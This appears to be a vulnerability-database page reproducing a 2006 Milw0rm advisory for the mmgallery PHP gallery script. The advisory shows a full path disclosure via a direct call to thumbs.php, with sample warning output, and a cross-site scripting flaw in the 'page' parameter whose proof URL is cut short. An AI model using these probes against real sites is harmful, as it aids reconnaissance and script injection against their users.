mmgallery Multiple vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053091 漏洞类型
发布时间 2006-11-27 更新时间 2006-11-27
CVE编号 CVE-2006-6119
CVE-2006-6118
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110119
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++ 
+                                                                                 ;;ii,,:: +           
+                                                 ::::            ::              ;;tt;;::           + 
+                                                 ;;::          ..,,::            ;;ii,,::           + 
+                           ,,,,                ii;;,,          ii;;::            ;;ii,,::           + 
+                           ii::                tt;;,,        ..tt;;,,..          ;;ii;;::           + 
+                         ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::           + 
+                         tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::           + 
+                         tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::           + 
+                         tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::           + 
+                     ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::           + 
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::           + 
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::           + 
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::           + 
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..           + 
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..           + 
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..           + 
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..           + 
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..           + 
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..           + 
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..           + 
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;             + 
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,             + 
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,             + 
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::             + 
+                             iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii               + 
+                                                           ;;..                  ii;;               + 
+                                                                                 ..       + 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++ 
+                                                                                                 + 
Credit by : Al7ejaz HackerZ 
mmgallery Multiple vulnerabilities 
Script : mmgallery 
Website: mmgallery.net 
Impact : FullPath disclosure and Cross site Scripting 
FullPath disclosure in thumbs.php 
********************************* 
when thumbs.php file is called directelly withowth argument this cause fullpath disclosure 
http://localhost/thumbs.php 
Result 
------------------------------------------------------------------------
 
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/photos/functions.inc on line 46 
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 58 
Galery :: Title ::   
Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in /var/www/user/functions.inc on line 99 
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 101 
Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112 
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 113 
-------------------------------------------- 
Cross Site Scripting 
************************ 
page varibale is not proprely verified and can be used to execute arbitary htmlcode 
http://localhost/thumbs.php?page='> 
Al7ejaz HackerZ  ;) 
/Milw0rm